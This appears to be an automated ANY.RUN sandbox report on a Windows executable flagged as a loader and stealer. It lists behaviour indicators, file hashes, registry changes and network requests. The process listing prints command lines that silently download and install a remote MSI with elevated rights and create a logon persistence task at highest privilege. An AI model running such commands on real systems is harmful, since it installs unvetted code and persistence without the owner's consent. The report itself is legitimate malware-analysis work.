Malware analysis SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717 Malicious activity

Add for printing

File name:	SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717
Full analysis:	https://app.any.run/tasks/2360b354-58a0-4665-a33f-bd8ae9c4d892
Verdict:	Malicious activity
Threats:	A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	February 07, 2025, 18:46:56
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	loader mpress ahk arch-exec stealer
Indicators:
MIME:	application/vnd.microsoft.portable-executable
File info:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, 3 sections
MD5:	866819A07DD3AA53AC60E54DD1D1EB08
SHA1:	219C643039C6AD89CEB5BB6176577CB94CA187F8
SHA256:	C1066265B02FC53F4F6A5CCCC17BFB4896E35530E37871A5E568D1D855BB9D42
SSDEEP:	24576:VdHHzimeeg2SUbAztkER0426UY730qnY02:VdHHzipeg2SUbAztkER096UY7kqYH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- AHK has been detected (YARA)
  - SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe (PID: 4320)
- Uses Task Scheduler to autorun other applications
  - cmd.exe (PID: 4536)
- Starts CMD.EXE for self-deleting
  - latest.exe (PID: 6204)
  - latest.exe (PID: 6624)
- Steals credentials from Web Browsers
  - EPLowPrivilegeWorker.exe (PID: 3832)
- Actions looks like stealing of personal data
  - EPLowPrivilegeWorker.exe (PID: 3832)
- Bypass execution policy to execute commands
  - powershell.exe (PID: 7080)
- Changes powershell execution policy (Bypass)
  - NinjaRMMAgent.exe (PID: 7032)
SUSPICIOUS
- Reads security settings of Internet Explorer
  - SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe (PID: 4320)
  - latest.exe (PID: 6204)
  - nircmd.exe (PID: 6156)
  - RHP-Fall-2018-Update.exe (PID: 6536)
  - RHP-Fall-2018-Update.exe (PID: 6868)
  - nircmd.exe (PID: 5244)
  - nircmd.exe (PID: 2160)
  - setupdownloader.exe (PID: 6500)
  - MSIB598.tmp (PID: 6304)
  - latest.exe (PID: 6624)
  - nircmd.exe (PID: 6436)
  - Installer.exe (PID: 6884)
  - msiexec.exe (PID: 5200)
  - nircmd.exe (PID: 6400)
  - msiexec.exe (PID: 7068)
  - msiexec.exe (PID: 6520)
  - EPLowPrivilegeWorker.exe (PID: 3832)
  - rm.exe (PID: 556)
- Potential Corporate Privacy Violation
  - SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe (PID: 4320)
  - latest.exe (PID: 6204)
  - RHP-Fall-2018-Update.exe (PID: 6868)
  - setupdownloader.exe (PID: 6500)
- Executable content was dropped or overwritten
  - SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe (PID: 4320)
  - latest.exe (PID: 6204)
  - RHP-Fall-2018-Update.exe (PID: 6868)
  - MSIB598.tmp (PID: 6304)
  - setupdownloader.exe (PID: 6500)
  - Installer.exe (PID: 6884)
  - fd986b48-9690-4aba-994d-ff80ba46aaab-communityofficesintakeunverifiedcomputers-5.6.8294-windows-installer.exe (PID: 6412)
  - EPLowPrivilegeWorker.exe (PID: 3832)
  - NinjaRMMAgentPatcher.exe (PID: 6272)
  - NinjaRMMAgent.exe (PID: 7032)
- Changes internet zones settings
  - latest.exe (PID: 6204)
  - latest.exe (PID: 6624)
- Changes the desktop background image
  - latest.exe (PID: 6204)
  - latest.exe (PID: 6624)
- Process requests binary or script from the Internet
  - latest.exe (PID: 6204)
  - SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe (PID: 4320)
  - setupdownloader.exe (PID: 6500)
  - Installer.exe (PID: 6884)
- There is functionality for taking screenshot (YARA)
  - SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe (PID: 4320)
- Starts CMD.EXE for commands execution
  - latest.exe (PID: 6204)
  - nircmd.exe (PID: 5244)
  - nircmd.exe (PID: 6156)
  - latest.exe (PID: 6624)
  - nircmd.exe (PID: 6436)
  - msiexec.exe (PID: 7068)
  - NinjaRMMAgentPatcher.exe (PID: 6272)
  - NinjaRMMAgent.exe (PID: 7032)
- Reads the date of Windows installation
  - RHP-Fall-2018-Update.exe (PID: 6536)
  - nircmd.exe (PID: 5244)
  - nircmd.exe (PID: 2160)
  - nircmd.exe (PID: 6436)
  - nircmd.exe (PID: 6400)
  - nircmd.exe (PID: 6156)
- Application launched itself
  - RHP-Fall-2018-Update.exe (PID: 6536)
- Suspicious use of NETSH.EXE
  - cmd.exe (PID: 6780)
  - cmd.exe (PID: 7068)
  - cmd.exe (PID: 6904)
  - cmd.exe (PID: 6556)
- The process creates files with name similar to system file names
  - RHP-Fall-2018-Update.exe (PID: 6868)
- The process verifies whether the antivirus software is installed
  - latest.exe (PID: 6204)
  - latest.exe (PID: 6624)
  - Installer.exe (PID: 6884)
  - EPLowPrivilegeWorker.exe (PID: 3832)
  - EPMaintenanceService.exe (PID: 5096)
- Checks Windows Trust Settings
  - msiexec.exe (PID: 5200)
  - setupdownloader.exe (PID: 6500)
  - Installer.exe (PID: 6884)
  - EPLowPrivilegeWorker.exe (PID: 3832)
  - rm.exe (PID: 556)
- Adds/modifies Windows certificates
  - msiexec.exe (PID: 5200)
- Hides command output
  - cmd.exe (PID: 6268)
  - cmd.exe (PID: 7060)
  - cmd.exe (PID: 5964)
- Reads the Windows owner or organization settings
  - msiexec.exe (PID: 5200)
- Runs PING.EXE to delay simulation
  - cmd.exe (PID: 6268)
  - cmd.exe (PID: 5964)
- Drops 7-zip archiver for unpacking
  - setupdownloader.exe (PID: 6500)
- Process drops legitimate windows executable
  - setupdownloader.exe (PID: 6500)
  - fd986b48-9690-4aba-994d-ff80ba46aaab-communityofficesintakeunverifiedcomputers-5.6.8294-windows-installer.exe (PID: 6412)
  - NinjaRMMAgentPatcher.exe (PID: 6272)
  - Installer.exe (PID: 6884)
- The process drops C-runtime libraries
  - setupdownloader.exe (PID: 6500)
  - Installer.exe (PID: 6884)
- Process uses IPCONFIG to clear DNS cache
  - cmd.exe (PID: 7060)
- Creates a software uninstall entry
  - Installer.exe (PID: 6884)
- Searches for installed software
  - Installer.exe (PID: 6884)
  - EPLowPrivilegeWorker.exe (PID: 3832)
  - NinjaRMMAgentPatcher.exe (PID: 6272)
- Unpacks CAB file
  - expand.exe (PID: 5856)
- Executes as Windows Service
  - NinjaRMMAgentPatcher.exe (PID: 6272)
  - NinjaRMMAgentPatcher.exe (PID: 6656)
- Starts a Microsoft application from unusual location
  - cabarc.exe (PID: 6796)
- Uses TASKKILL.EXE to kill process
  - cmd.exe (PID: 1668)
- Restarts service on failure
  - sc.exe (PID: 6284)
- Starts POWERSHELL.EXE for commands execution
  - NinjaRMMAgent.exe (PID: 7032)
- Gets path to any of the special folders (POWERSHELL)
  - powershell.exe (PID: 7080)
- The process executes Powershell scripts
  - NinjaRMMAgent.exe (PID: 7032)
INFO
- The sample compiled with english language support
  - SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe (PID: 4320)
  - RHP-Fall-2018-Update.exe (PID: 6868)
  - setupdownloader.exe (PID: 6500)
  - Installer.exe (PID: 6884)
  - fd986b48-9690-4aba-994d-ff80ba46aaab-communityofficesintakeunverifiedcomputers-5.6.8294-windows-installer.exe (PID: 6412)
  - EPLowPrivilegeWorker.exe (PID: 3832)
  - NinjaRMMAgentPatcher.exe (PID: 6272)
  - NinjaRMMAgent.exe (PID: 7032)
- Checks supported languages
  - SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe (PID: 4320)
  - latest.exe (PID: 6204)
  - RHP-Fall-2018-Update.exe (PID: 6536)
  - RHP-Fall-2018-Update.exe (PID: 6868)
  - nircmd.exe (PID: 6156)
  - msiexec.exe (PID: 5200)
  - nircmd.exe (PID: 5244)
  - nircmd.exe (PID: 2160)
  - MSIB598.tmp (PID: 6304)
  - setupdownloader.exe (PID: 6500)
  - latest.exe (PID: 6624)
  - nircmd.exe (PID: 6436)
  - nircmd.exe (PID: 6400)
  - Installer.exe (PID: 6884)
  - expand.exe (PID: 5856)
  - fd986b48-9690-4aba-994d-ff80ba46aaab-communityofficesintakeunverifiedcomputers-5.6.8294-windows-installer.exe (PID: 6412)
  - msiexec.exe (PID: 7068)
  - msiexec.exe (PID: 6520)
  - EPLowPrivilegeWorker.exe (PID: 3832)
  - rm.exe (PID: 556)
  - NinjaRMMAgentPatcher.exe (PID: 6272)
  - cabarc.exe (PID: 6796)
  - cabarc.exe (PID: 6236)
- Reads the computer name
  - SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe (PID: 4320)
  - latest.exe (PID: 6204)
  - RHP-Fall-2018-Update.exe (PID: 6536)
  - RHP-Fall-2018-Update.exe (PID: 6868)
  - nircmd.exe (PID: 6156)
  - nircmd.exe (PID: 5244)
  - msiexec.exe (PID: 5200)
  - nircmd.exe (PID: 2160)
  - MSIB598.tmp (PID: 6304)
  - setupdownloader.exe (PID: 6500)
  - latest.exe (PID: 6624)
  - nircmd.exe (PID: 6436)
  - Installer.exe (PID: 6884)
  - nircmd.exe (PID: 6400)
  - msiexec.exe (PID: 7068)
  - msiexec.exe (PID: 6520)
  - EPLowPrivilegeWorker.exe (PID: 3832)
  - fd986b48-9690-4aba-994d-ff80ba46aaab-communityofficesintakeunverifiedcomputers-5.6.8294-windows-installer.exe (PID: 6412)
  - rm.exe (PID: 556)
  - NinjaRMMAgentPatcher.exe (PID: 6272)
  - NinjaRMMAgentPatcher.exe (PID: 4968)
- Checks proxy server information
  - SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe (PID: 4320)
  - latest.exe (PID: 6204)
  - RHP-Fall-2018-Update.exe (PID: 6868)
  - setupdownloader.exe (PID: 6500)
  - latest.exe (PID: 6624)
  - Installer.exe (PID: 6884)
- Detects AutoHotkey samples (YARA)
  - SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe (PID: 4320)
- Mpress packer has been detected
  - SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe (PID: 4320)
- Process checks computer location settings
  - RHP-Fall-2018-Update.exe (PID: 6536)
  - nircmd.exe (PID: 6156)
  - nircmd.exe (PID: 5244)
  - nircmd.exe (PID: 2160)
  - MSIB598.tmp (PID: 6304)
  - nircmd.exe (PID: 6436)
  - nircmd.exe (PID: 6400)
  - msiexec.exe (PID: 6520)
- NirSoft software is detected
  - nircmd.exe (PID: 6156)
  - nircmd.exe (PID: 5244)
  - nircmd.exe (PID: 2160)
  - nircmd.exe (PID: 6436)
  - nircmd.exe (PID: 6400)
- Reads the machine GUID from the registry
  - msiexec.exe (PID: 5200)
  - setupdownloader.exe (PID: 6500)
  - Installer.exe (PID: 6884)
  - EPLowPrivilegeWorker.exe (PID: 3832)
  - rm.exe (PID: 556)
  - NinjaRMMAgent.exe (PID: 7032)
- Reads the software policy settings
  - msiexec.exe (PID: 5200)
  - setupdownloader.exe (PID: 6500)
  - Installer.exe (PID: 6884)
  - EPLowPrivilegeWorker.exe (PID: 3832)
  - rm.exe (PID: 556)
- Executable content was dropped or overwritten
  - msiexec.exe (PID: 5200)
- Starts application with an unusual extension
  - msiexec.exe (PID: 5200)
- Create files in a temporary directory
  - MSIB598.tmp (PID: 6304)
  - setupdownloader.exe (PID: 6500)
  - Installer.exe (PID: 6884)
  - msiexec.exe (PID: 7068)
  - expand.exe (PID: 5856)
  - fd986b48-9690-4aba-994d-ff80ba46aaab-communityofficesintakeunverifiedcomputers-5.6.8294-windows-installer.exe (PID: 6412)
- Creates files or folders in the user directory
  - msiexec.exe (PID: 5200)
- Creates files in the program directory
  - setupdownloader.exe (PID: 6500)
  - Installer.exe (PID: 6884)
  - fd986b48-9690-4aba-994d-ff80ba46aaab-communityofficesintakeunverifiedcomputers-5.6.8294-windows-installer.exe (PID: 6412)
  - EPLowPrivilegeWorker.exe (PID: 3832)
  - NinjaRMMAgentPatcher.exe (PID: 6272)
  - rm.exe (PID: 556)
  - cabarc.exe (PID: 6236)
  - NinjaRMMAgentPatcher.exe (PID: 4968)
  - NinjaRMMAgentPatcher.exe (PID: 6656)
  - cabarc.exe (PID: 1448)
  - NinjaRMMAgent.exe (PID: 7032)
- Reads CPU info
  - fd986b48-9690-4aba-994d-ff80ba46aaab-communityofficesintakeunverifiedcomputers-5.6.8294-windows-installer.exe (PID: 6412)
- Reads the time zone
  - fd986b48-9690-4aba-994d-ff80ba46aaab-communityofficesintakeunverifiedcomputers-5.6.8294-windows-installer.exe (PID: 6412)
- Process checks whether UAC notifications are on
  - fd986b48-9690-4aba-994d-ff80ba46aaab-communityofficesintakeunverifiedcomputers-5.6.8294-windows-installer.exe (PID: 6412)
- Manual execution by a user
  - cabarc.exe (PID: 6796)
  - EPLowPrivilegeWorker.exe (PID: 2124)
- Creates a software uninstall entry
  - msiexec.exe (PID: 5200)
- Checks whether the specified file exists (POWERSHELL)
  - powershell.exe (PID: 7080)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.exe	\|	Generic Win/DOS Executable (50)
.exe	\|	DOS Executable Generic (49.9)

EXIF

EXE

MachineType:	AMD AMD64
TimeStamp:	2020:07:17 10:53:28+00:00
ImageFileCharacteristics:	No relocs, Executable, Large address aware, No debug
PEType:	PE32+
LinkerVersion:	14
CodeSize:	804352
InitializedDataSize:	360960
UninitializedDataSize:	-
EntryPoint:	0x127392
OSVersion:	5.2
ImageVersion:	-
SubsystemVersion:	5.2
Subsystem:	Windows GUI
FileVersionNumber:	1.1.33.2
ProductVersionNumber:	1.1.33.2
FileFlagsMask:	0x0017
FileFlags:	(none)
FileOS:	Win32
ObjectFileType:	Executable application
FileSubtype:	-
LanguageCode:	English (U.S.)
CharacterSet:	Unicode
FileDescription:	-
FileVersion:	1.1.33.02
InternalName:	-
LegalCopyright:	-
OriginalFileName:	-
ProductName:	-
ProductVersion:	1.1.33.02

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

220

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

556

--pid=3832

C:\Windows\Temp\rm.exe

—

EPLowPrivilegeWorker.exe

User:

admin

Company:

OPSWAT, Inc.

Integrity Level:

HIGH

Description:

MDES SDK V4 Removal Module

Exit code:

Version:

2017.08.20.0920

1448

"C:\Program Files (x86)\communityofficesintakeunverifiedcomputers-5.6.8294\cabarc.exe" -o X "C:\ProgramData\NinjaRMMAgent\download\agent.cab" C:\ProgramData\NinjaRMMAgent\download\upgrade_from_agent5.6.8294\

C:\Program Files (x86)\communityofficesintakeunverifiedcomputers-5.6.8294\cabarc.exe

—

NinjaRMMAgentPatcher.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Microsoft® Cabinet Tool

Exit code:

Version:

5.2.3790.0 (srv03_rtm.030324-2048)

1668

cmd.exe /c "taskkill /im ninjarmmagent.exe /f /t"

C:\Windows\SysWOW64\cmd.exe

—

NinjaRMMAgentPatcher.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Windows Command Processor

Exit code:

128

Version:

10.0.19041.3636 (WinBuild.160101.0800)

1796

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

rm.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

2124

"C:\Users\admin\Desktop\EPLowPrivilegeWorker.exe"

C:\Users\admin\Desktop\EPLowPrivilegeWorker.exe

—

explorer.exe

User:

admin

Company:

Bitdefender

Integrity Level:

MEDIUM

Description:

Host for Endpoint Security

Exit code:

5002

Version:

7.9.19.475

2160

C:\rhpsupport\tools\nircmd.exe elevate msiexec /qn /i https://public.rhp-properties.com/corporate/support/packages/communityofficesintakeunverifiedcomputers-5.6.8294-windows-installer.msi

C:\RHPSupport\tools\nircmd.exe

—

latest.exe

User:

admin

Company:

NirSoft

Integrity Level:

MEDIUM

Description:

NirCmd

Exit code:

Version:

2.86

Modules

Images
c:\rhpsupport\tools\nircmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll

2408

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cabarc.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

2448

schtasks.exe /create /tn "RHPStartupDownloader" /tr "C:\RHPSupport\Startup-Downloader.exe" /rl HIGHEST /sc ONLOGON /DELAY 0000:30 /F /RU "BuiltIn\Users"

C:\Windows\System32\schtasks.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Task Scheduler Configuration Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll

2448

netsh wlan add profile filename="C:\RHPSupport\Tools\Wi-Fi-rhpwifi.xml" user=all

C:\Windows\System32\netsh.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Network Command Shell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll

3260

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

Add for printing

Total events

79 001

Read events

78 699

Write events

281

Delete events

Modification events


(PID) Process:	(6204) latest.exe	Key:	HKEY_CURRENT_USER\Wow6432Node\Software\Microsoft\Internet Explorer\Privacy
Operation:	write	Name:	ClearBrowsingHistoryOnExit
Value: 0
(PID) Process:	(6204) latest.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\BrowserEmulation\ClearableListData
Operation:	write	Name:	UserFilter
Value: 411F00005308ADBA070000004E01000001000000070000000C000000499A2447F5F1CE010100000012007200680070002D00700072006F0070006500720074006900650073002E0063006F006D000C000000A9E425503D87CF010100000011006D0061006E0061006700650061006D00650072006900630061002E0063006F006D000C000000642A6CD1948CCF01010000000C0063006F006D00650072006900630061002E0063006F006D000C00000064A17DD2948CCF01010000000F0073007400610070006C00650073006C0069006E006B002E0063006F006D000C0000005437C70CBB8CCF01010000000E006400650070006F007300690074006E006F0077002E0063006F006D000C000000686AACC83364D101010000000B0070006100790063006800650078002E0063006F006D000C000000A2D4EF7CB7EDD101010000000B007600650073007400690076006F002E0063006F006D00
(PID) Process:	(6204) latest.exe	Key:	HKEY_CURRENT_USER\Wow6432Node\Software\Microsoft\Internet Explorer\BrowserEmulation\ClearableListData
Operation:	write	Name:	UserFilter
Value: 411F00005308ADBA070000004E01000001000000070000000C000000499A2447F5F1CE010100000012007200680070002D00700072006F0070006500720074006900650073002E0063006F006D000C000000A9E425503D87CF010100000011006D0061006E0061006700650061006D00650072006900630061002E0063006F006D000C000000642A6CD1948CCF01010000000C0063006F006D00650072006900630061002E0063006F006D000C00000064A17DD2948CCF01010000000F0073007400610070006C00650073006C0069006E006B002E0063006F006D000C0000005437C70CBB8CCF01010000000E006400650070006F007300690074006E006F0077002E0063006F006D000C000000686AACC83364D101010000000B0070006100790063006800650078002E0063006F006D000C000000A2D4EF7CB7EDD101010000000B007600650073007400690076006F002E0063006F006D00
(PID) Process:	(6204) latest.exe	Key:	HKEY_CURRENT_USER\Control Panel\Desktop
Operation:	write	Name:	Wallpaper
Value: C:\Users\admin\Documents\wide.bmp
(PID) Process:	(6204) latest.exe	Key:	HKEY_CURRENT_USER\Control Panel\Desktop
Operation:	write	Name:	TileWallpaper
Value: 0
(PID) Process:	(6204) latest.exe	Key:	HKEY_CURRENT_USER\Control Panel\Desktop
Operation:	write	Name:	WallpaperStyle
Value: 0
(PID) Process:	(6204) latest.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\rhp-properties.com
Operation:	write	Name:	*
Value: 2
(PID) Process:	(6204) latest.exe	Key:	HKEY_CURRENT_USER\Wow6432Node\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\rhp-properties.com
Operation:	write	Name:	*
Value: 2
(PID) Process:	(6204) latest.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\manageamerica.com
Operation:	write	Name:	*
Value: 2
(PID) Process:	(6204) latest.exe	Key:	HKEY_CURRENT_USER\Wow6432Node\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\manageamerica.com
Operation:	write	Name:	*
Value: 2

Add for printing

Executable files

151

Suspicious files

Text files

219

Unknown types

Dropped files

PID	Process	Filename		Type
6204	latest.exe	C:\Users\admin\Documents\wide.bmp		—
		MD5:—	SHA256:—
6204	latest.exe	C:\RHPSupport\tools\BEST_downloaderWrapper.msi		—
		MD5:—	SHA256:—
5200	msiexec.exe	C:\Windows\Installer\13b22c.msi		—
		MD5:—	SHA256:—
5200	msiexec.exe	C:\Windows\Installer\MSIB4FB.tmp		—
		MD5:—	SHA256:—
6868	RHP-Fall-2018-Update.exe	C:\RHPSupport\tools\nircmd.exe		executable
		MD5:5ED4728CAA339C2A7479102F0C04C087	SHA256:7160DB2B7A6680480E64F0845512D203A575F807831FAF9A652AAEF0988F876C
6204	latest.exe	C:\Users\admin\Documents\RHP-Fall-2018-Update.exe		executable
		MD5:B2F1091EFA6F3D222B0FCF9CF4CCB89E	SHA256:0D61EACAEC8E0DF1C245F7720A06278F5429FA86DC6737C2CA72B391C5EB44C9
6868	RHP-Fall-2018-Update.exe	C:\RHPSupport\tools\nircmd-64.exe		executable
		MD5:5ED4728CAA339C2A7479102F0C04C087	SHA256:7160DB2B7A6680480E64F0845512D203A575F807831FAF9A652AAEF0988F876C
4320	SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe	C:\Users\admin\Documents\latest.exe		executable
		MD5:C1387D5602F2AB49D37EC684FF7C1052	SHA256:F17D52B63D82F840A3BD24274881D4F4941EEAEC034A12A7A1E185A1418326E0
6868	RHP-Fall-2018-Update.exe	C:\RHPSupport\Startup-Downloader.exe		executable
		MD5:866819A07DD3AA53AC60E54DD1D1EB08	SHA256:C1066265B02FC53F4F6A5CCCC17BFB4896E35530E37871A5E568D1D855BB9D42
6868	RHP-Fall-2018-Update.exe	C:\RHPSupport\tools\nircmd-32.exe		executable
		MD5:A1CD6A64E8F8AD5D4B6C07DC4113C7EC	SHA256:B994AE5CBFB5AD308656E9A8BF7A4A866FDEB9E23699F89F048D7F92E6BB8577

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

129

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3220	svchost.exe	GET	200	95.101.149.131:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
3220	svchost.exe	GET	200	2.16.241.12:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
4712	MoUsoCoreWorker.exe	GET	200	95.101.149.131:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
4320	SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe	GET	200	12.177.128.130:80	http://public.rhp-properties.com/corporate/support/packages/latest.exe	unknown	—	—	malicious
6868	RHP-Fall-2018-Update.exe	GET	200	12.177.128.130:80	http://public.rhp-properties.com/corporate/support/packages/Startup-Downloader.exe	unknown	—	—	unknown
